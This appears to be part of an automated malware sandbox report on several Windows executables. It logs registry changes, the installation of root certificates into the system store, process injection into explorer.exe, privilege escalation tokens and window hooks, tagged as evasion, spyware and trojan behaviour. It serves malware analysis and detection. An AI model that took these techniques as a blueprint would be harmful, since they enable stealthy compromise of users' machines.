Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-201 = "US Mountain Daylight Time"	27B3.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-492 = "India Standard Time"	27B3.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-842 = "Argentina Standard Time"	27B3.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-361 = "GTB Daylight Time"	27B3.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-791 = "SA Western Daylight Time"	27B3.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-141 = "Canada Central Daylight Time"	27B3.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-232 = "Hawaiian Standard Time"	27B3.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-962 = "Paraguay Standard Time"	27B3.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-421 = "Russian Daylight Time"	27B3.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-462 = "Afghanistan Standard Time"	27B3.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-571 = "China Daylight Time"	27B3.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-42 = "E. South America Standard Time"	27B3.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	27B3.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-12 = "Azores Standard Time"	27B3.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-282 = "Central Europe Standard Time"	27B3.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-412 = "E. Africa Standard Time"	27B3.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-31 = "Mid-Atlantic Daylight Time"	27B3.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-522 = "N. Central Asia Standard Time"	27B3.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-792 = "SA Western Standard Time"	27B3.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	27B3.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	27B3.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-252 = "Dateline Standard Time"	27B3.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	27B3.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-111 = "Eastern Daylight Time"	27B3.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-434 = "Georgian Daylight Time"	27B3.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-261 = "GMT Daylight Time"	27B3.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-491 = "India Daylight Time"	27B3.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-932 = "Coordinated Universal Time"	27B3.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-365 = "Middle East Standard Time"	27B3.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-872 = "Pakistan Standard Time"	27B3.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	27B3.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-291 = "Central European Daylight Time"	27B3.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-682 = "E. Australia Standard Time"	27B3.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-335 = "Jordan Standard Time"	27B3.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-241 = "Samoa Daylight Time"	27B3.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	27B3.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-671 = "AUS Eastern Daylight Time"	27B3.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-172 = "Central Standard Time (Mexico)"	27B3.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-572 = "China Standard Time"	27B3.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-892 = "Morocco Standard Time"	27B3.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-622 = "Korea Standard Time"	27B3.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	27B3.exe

Modifies system certificate store 2 TTPs 8 IoCs

evasion spyware trojan

Install Root Certificate

T1130

Modify Registry

T1112

Processes:

Mejaelaelolae.exe27B3.exe8187.exe

description	ioc	process
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f00000053000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	Mejaelaelolae.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 040000000100000010000000497904b0eb8719ac47b0bc11519b74d00f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030853000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c00b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	Mejaelaelolae.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13	27B3.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 040000000100000010000000410352dc0ff7501b16f0028eba6f45c50f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d0b000000010000001e000000440053005400200052006f006f0074002000430041002000580033000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc415608589101d00000001000000100000004558d512eecb27464920897de7b66053030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c131900000001000000100000006cf252fec3e8f20996de5d4dd9aef42420000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510	27B3.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436	8187.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436\Blob = 04000000010000001000000079e4a9840d7d3a96d7c04fe2434c892e0f0000000100000014000000b34ddd372ed92e8f2abfbb9e20a9d31f204f194b090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030814000000010000001400000003de503556d14cbb66f0a3e21b1bc397b23dd1550b00000001000000120000004400690067006900430065007200740000001d000000010000001000000059779e39e21a2e3dfced6857ed5c5fd9030000000100000014000000a8985d3a65e5e5c4b2d7d66d40c6dd2fb19c54361900000001000000100000000f3a0527d242de2dc98e5cfcb1e991ee2000000001000000b3030000308203af30820297a0030201020210083be056904246b1a1756ac95991c74a300d06092a864886f70d01010505003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100e23be11172dea8a4d3a357aa50a28f0b7790c9a2a5ee12ce965b010920cc0193a74e30b753f743c46900579de28d22dd870640008109cece1b83bfdfcd3b7146e2d666c705b37627168f7b9e1e957deeb748a308dad6af7a0c3906657f4a5d1fbc17f8abbeee28d7747f7a78995985686e5c23324bbf4ec0e85a6de370bf7710bffc01f685d9a844105832a97518d5d1a2be47e2276af49a33f84908608bd45fb43a84bfa1aa4a4c7d3ecf4f5f6c765ea04b37919edc22e66dce141a8e6acbfecdb3146417c75b299e32bff2eefad30b42d4abb74132da0cd4eff881d5bb8d583fb51be84928a270da3104ddf7b216f24c0a4e07a8ed4a3d5eb57fa390c3af270203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041403de503556d14cbb66f0a3e21b1bc397b23dd155301f0603551d2304183016801403de503556d14cbb66f0a3e21b1bc397b23dd155300d06092a864886f70d01010505000382010100cb9c37aa4813120afadd449c4f52b0f4dfae04f5797908a32418fc4b2b84c02db9d5c7fef4c11f58cbb86d9c7a74e79829ab11b5e370a0a1cd4c8899938c9170e2ab0f1cbe93a9ff63d5e40760d3a3bf9d5b09f1d58ee353f48e63fa3fa7dbb466df6266d6d16e418df22db5ea774a9f9d58e22b59c04023ed2d2882453e7954922698e08048a837eff0d6796016deace80ecd6eac4417382f49dae1453e2ab93653cf3a5006f72ee8c457496c612118d504ad783c2c3a806ba7ebaf1514e9d889c1b9386ce2916c8aff64b977255730c01b24a3e1dce9df477cb5b424080530ec2dbd0bbf45bf50b9a9f3eb980112adc888c698345f8d0a3cc6e9d595956dde	8187.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349	Mejaelaelolae.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030853000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c00b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	Mejaelaelolae.exe

Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs

Processes:

toolspab1.exe

pid process

1264 toolspab1.exe

pid	process
1264	toolspab1.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

toolspab2 (20).exe

pid	process
812	toolspab2 (20).exe
812	toolspab2 (20).exe
1356
1356
1356
1356
1356
1356
1356
1356
1356
1356
1356
1356
1356
1356
1356
1356
1356
1356
1356
1356
1356
1356
1356
1356
1356
1356
1356
1356
1356
1356
1356
1356
1356
1356
1356
1356
1356
1356
1356
1356
1356
1356
1356
1356
1356
1356
1356
1356
1356
1356
1356
1356
1356
1356
1356
1356
1356
1356
1356
1356
1356
1356

Suspicious behavior: GetForegroundWindowSpam 2 IoCs

Processes:

iexplore.exe

pid process

1356
736 iexplore.exe

pid	process
1356
736	iexplore.exe

Suspicious behavior: MapViewOfSection 64 IoCs

Processes:

toolspab2 (20).exe177A.exeexplorer.exeexplorer.exeexplorer.exeexplorer.exeexplorer.exeexplorer.exehtwccubtjwccubhtwccubtjwccub

pid	process
812	toolspab2 (20).exe
1920	177A.exe
1356
1356
1356
1356
1356
1356
1356
1356
1356
1356
1356
1356
1356
1356
1356
1356
1356
1356
1644	explorer.exe
1644	explorer.exe
1136	explorer.exe
1136	explorer.exe
1948	explorer.exe
1948	explorer.exe
1188	explorer.exe
1188	explorer.exe
1656	explorer.exe
1656	explorer.exe
1952	explorer.exe
1952	explorer.exe
2160	htwccub
2536	tjwccub
1136	explorer.exe
1136	explorer.exe
1948	explorer.exe
1948	explorer.exe
1656	explorer.exe
1656	explorer.exe
1952	explorer.exe
1952	explorer.exe
1188	explorer.exe
1188	explorer.exe
1656	explorer.exe
1656	explorer.exe
1952	explorer.exe
1952	explorer.exe
1188	explorer.exe
1188	explorer.exe
3028	htwccub
2864	tjwccub
1656	explorer.exe
1656	explorer.exe
1188	explorer.exe
1188	explorer.exe
1952	explorer.exe
1952	explorer.exe
1656	explorer.exe
1656	explorer.exe
1952	explorer.exe
1952	explorer.exe
1188	explorer.exe
1188	explorer.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

591C.exe591C.exetaskkill.exe27B3.exe8187.exetaskkill.exeMejaelaelolae.exe8C32.exe

description	pid	process
Token: SeDebugPrivilege	1700	591C.exe
Token: SeDebugPrivilege	1732	591C.exe
Token: SeDebugPrivilege	1624	taskkill.exe
Token: SeShutdownPrivilege	1356
Token: SeShutdownPrivilege	1356
Token: SeShutdownPrivilege	1356
Token: SeDebugPrivilege	1720	27B3.exe
Token: SeImpersonatePrivilege	1720	27B3.exe
Token: SeShutdownPrivilege	1356
Token: SeShutdownPrivilege	1356
Token: SeCreateTokenPrivilege	856	8187.exe
Token: SeAssignPrimaryTokenPrivilege	856	8187.exe
Token: SeLockMemoryPrivilege	856	8187.exe
Token: SeIncreaseQuotaPrivilege	856	8187.exe
Token: SeMachineAccountPrivilege	856	8187.exe
Token: SeTcbPrivilege	856	8187.exe
Token: SeSecurityPrivilege	856	8187.exe
Token: SeTakeOwnershipPrivilege	856	8187.exe
Token: SeLoadDriverPrivilege	856	8187.exe
Token: SeSystemProfilePrivilege	856	8187.exe
Token: SeSystemtimePrivilege	856	8187.exe
Token: SeProfSingleProcessPrivilege	856	8187.exe
Token: SeIncBasePriorityPrivilege	856	8187.exe
Token: SeCreatePagefilePrivilege	856	8187.exe
Token: SeCreatePermanentPrivilege	856	8187.exe
Token: SeBackupPrivilege	856	8187.exe
Token: SeRestorePrivilege	856	8187.exe
Token: SeShutdownPrivilege	856	8187.exe
Token: SeDebugPrivilege	856	8187.exe
Token: SeAuditPrivilege	856	8187.exe
Token: SeSystemEnvironmentPrivilege	856	8187.exe
Token: SeChangeNotifyPrivilege	856	8187.exe
Token: SeRemoteShutdownPrivilege	856	8187.exe
Token: SeUndockPrivilege	856	8187.exe
Token: SeSyncAgentPrivilege	856	8187.exe
Token: SeEnableDelegationPrivilege	856	8187.exe
Token: SeManageVolumePrivilege	856	8187.exe
Token: SeImpersonatePrivilege	856	8187.exe
Token: SeCreateGlobalPrivilege	856	8187.exe
Token: 31	856	8187.exe
Token: 32	856	8187.exe
Token: 33	856	8187.exe
Token: 34	856	8187.exe
Token: 35	856	8187.exe
Token: SeShutdownPrivilege	1356
Token: SeDebugPrivilege	2428	taskkill.exe
Token: SeShutdownPrivilege	1356
Token: SeShutdownPrivilege	1356
Token: SeDebugPrivilege	1176	Mejaelaelolae.exe
Token: SeShutdownPrivilege	1356
Token: SeDebugPrivilege	2104	8C32.exe
Token: SeShutdownPrivilege	1356
Token: SeShutdownPrivilege	1356
Token: SeShutdownPrivilege	1356
Token: SeShutdownPrivilege	1356
Token: SeShutdownPrivilege	1356
Token: SeShutdownPrivilege	1356
Token: SeShutdownPrivilege	1356
Token: SeShutdownPrivilege	1356
Token: SeShutdownPrivilege	1356
Token: SeShutdownPrivilege	1356
Token: SeShutdownPrivilege	1356
Token: SeShutdownPrivilege	1356
Token: SeShutdownPrivilege	1356

Suspicious use of FindShellTrayWindow 13 IoCs

Processes:

irecord.tmpiexplore.exe

pid process

1356
1356
1356
1356
1356
1356
1620 irecord.tmp
736 iexplore.exe
736 iexplore.exe
736 iexplore.exe
736 iexplore.exe
736 iexplore.exe
736 iexplore.exe
Suspicious use of SendNotifyMessage 11 IoCs

Processes:

pid process

1356
1356
1356
1356
1356
1356
1356
1356
1356
1356
1356

pid	process
1356
1356
1356
1356
1356
1356
1620	irecord.tmp
736	iexplore.exe
736	iexplore.exe
736	iexplore.exe
736	iexplore.exe
736	iexplore.exe
736	iexplore.exe

pid	process
1356
1356
1356
1356
1356
1356
1356
1356
1356
1356
1356

Suspicious use of SetWindowsHookEx 36 IoCs

Processes:

iexplore.exeIEXPLORE.EXEIEXPLORE.EXEIEXPLORE.EXEIEXPLORE.EXEIEXPLORE.EXEIEXPLORE.EXE

pid	process
736	iexplore.exe
736	iexplore.exe
736	iexplore.exe
736	iexplore.exe
2584	IEXPLORE.EXE
2584	IEXPLORE.EXE
736	iexplore.exe
736	iexplore.exe
1944	IEXPLORE.EXE
1944	IEXPLORE.EXE
1944	IEXPLORE.EXE
1944	IEXPLORE.EXE
736	iexplore.exe
736	iexplore.exe
2284	IEXPLORE.EXE
2284	IEXPLORE.EXE
2284	IEXPLORE.EXE
2284	IEXPLORE.EXE
736	iexplore.exe
736	iexplore.exe
2200	IEXPLORE.EXE
2200	IEXPLORE.EXE
2200	IEXPLORE.EXE
2200	IEXPLORE.EXE
736	iexplore.exe
736	iexplore.exe
2248	IEXPLORE.EXE
2248	IEXPLORE.EXE
